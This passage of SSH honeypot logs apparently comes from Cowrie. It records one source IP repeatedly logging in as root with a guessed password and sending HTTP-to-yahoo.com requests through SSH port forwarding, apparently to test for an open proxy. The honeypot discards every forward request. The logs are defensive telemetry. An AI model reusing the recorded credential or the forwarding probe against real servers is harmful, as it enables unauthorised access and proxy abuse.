ish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.955803Z","src_ip":"213.209.150.239","session":"eac13320d7bb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:22.190653Z","src_ip":"213.209.150.239","session":"eac13320d7bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":14221,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:14221","sensor":"my-vps","timestamp":"2025-08-26T00:57:22.238972Z","session":"eac13320d7bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:22.286312Z","src_ip":"213.209.150.239","session":"eac13320d7bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2834,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2834","sensor":"my-vps","timestamp":"2025-08-26T00:57:22.421695Z","session":"eac13320d7bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:22.469210Z","src_ip":"213.209.150.239","session":"eac13320d7bb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:22.517267Z","src_ip":"213.209.150.239","session":"eac13320d7bb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60126,"dst_ip":"1.2.3.4","dst_port":22,"session":"d98f0ad762e4","protocol":"ssh","message":"New connection: 213.209.150.239:60126 (1.2.3.4:22) [session: d98f0ad762e4]","sensor":"my-vps","timestamp":"2025-08-26T00:57:22.572748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:22.573941Z","src_ip":"213.209.150.239","session":"d98f0ad762e4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:22.630494Z","src_ip":"213.209.150.239","session":"d98f0ad762e4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:22.912327Z","src_ip":"213.209.150.239","session":"d98f0ad762e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":11937,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11937","sensor":"my-vps","timestamp":"2025-08-26T00:57:22.969877Z","session":"d98f0ad762e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:23.026634Z","src_ip":"213.209.150.239","session":"d98f0ad762e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":26068,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26068","sensor":"my-vps","timestamp":"2025-08-26T00:57:23.183042Z","session":"d98f0ad762e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:23.239762Z","src_ip":"213.209.150.239","session":"d98f0ad762e4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:23.297225Z","src_ip":"213.209.150.239","session":"d98f0ad762e4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60174,"dst_ip":"1.2.3.4","dst_port":22,"session":"6166debec0d7","protocol":"ssh","message":"New connection: 213.209.150.239:60174 (1.2.3.4:22) [session: 6166debec0d7]","sensor":"my-vps","timestamp":"2025-08-26T00:57:23.352959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:23.353588Z","src_ip":"213.209.150.239","session":"6166debec0d7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:23.410326Z","src_ip":"213.209.150.239","session":"6166debec0d7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:23.692420Z","src_ip":"213.209.150.239","session":"6166debec0d7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":20448,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:20448","sensor":"my-vps","timestamp":"2025-08-26T00:57:23.749778Z","session":"6166debec0d7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:23.806418Z","src_ip":"213.209.150.239","session":"6166debec0d7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23009,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23009","sensor":"my-vps","timestamp":"2025-08-26T00:57:23.963129Z","session":"6166debec0d7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.019814Z","src_ip":"213.209.150.239","session":"6166debec0d7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.077257Z","src_ip":"213.209.150.239","session":"6166debec0d7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60222,"dst_ip":"1.2.3.4","dst_port":22,"session":"91480878e306","protocol":"ssh","message":"New connection: 213.209.150.239:60222 (1.2.3.4:22) [session: 91480878e306]","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.133090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.133978Z","src_ip":"213.209.150.239","session":"91480878e306"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.190437Z","src_ip":"213.209.150.239","session":"91480878e306"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.472270Z","src_ip":"213.209.150.239","session":"91480878e306"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":28884,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28884","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.530477Z","session":"91480878e306"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.587274Z","src_ip":"213.209.150.239","session":"91480878e306"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":22581,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22581","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.743129Z","session":"91480878e306"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.800115Z","src_ip":"213.209.150.239","session":"91480878e306"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.857492Z","src_ip":"213.209.150.239","session":"91480878e306"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60281,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cfdd89c8b75","protocol":"ssh","message":"New connection: 213.209.150.239:60281 (1.2.3.4:22) [session: 4cfdd89c8b75]","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.912926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.913520Z","src_ip":"213.209.150.239","session":"4cfdd89c8b75"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:24.970011Z","src_ip":"213.209.150.239","session":"4cfdd89c8b75"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:25.252123Z","src_ip":"213.209.150.239","session":"4cfdd89c8b75"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":29324,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29324","sensor":"my-vps","timestamp":"2025-08-26T00:57:25.310108Z","session":"4cfdd89c8b75"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:25.366709Z","src_ip":"213.209.150.239","session":"4cfdd89c8b75"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":29558,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29558","sensor":"my-vps","timestamp":"2025-08-26T00:57:25.523031Z","session":"4cfdd89c8b75"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:25.580001Z","src_ip":"213.209.150.239","session":"4cfdd89c8b75"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:25.637561Z","src_ip":"213.209.150.239","session":"4cfdd89c8b75"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60328,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bab99f9948b","protocol":"ssh","message":"New connection: 213.209.150.239:60328 (1.2.3.4:22) [session: 6bab99f9948b]","sensor":"my-vps","timestamp":"2025-08-26T00:57:25.683846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:25.685246Z","src_ip":"213.209.150.239","session":"6bab99f9948b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:25.732540Z","src_ip":"213.209.150.239","session":"6bab99f9948b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:25.967669Z","src_ip":"213.209.150.239","session":"6bab99f9948b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":28398,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:28398","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.015700Z","session":"6bab99f9948b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.062832Z","src_ip":"213.209.150.239","session":"6bab99f9948b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":6114,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6114","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.197723Z","session":"6bab99f9948b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.245086Z","src_ip":"213.209.150.239","session":"6bab99f9948b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.293921Z","src_ip":"213.209.150.239","session":"6bab99f9948b"}
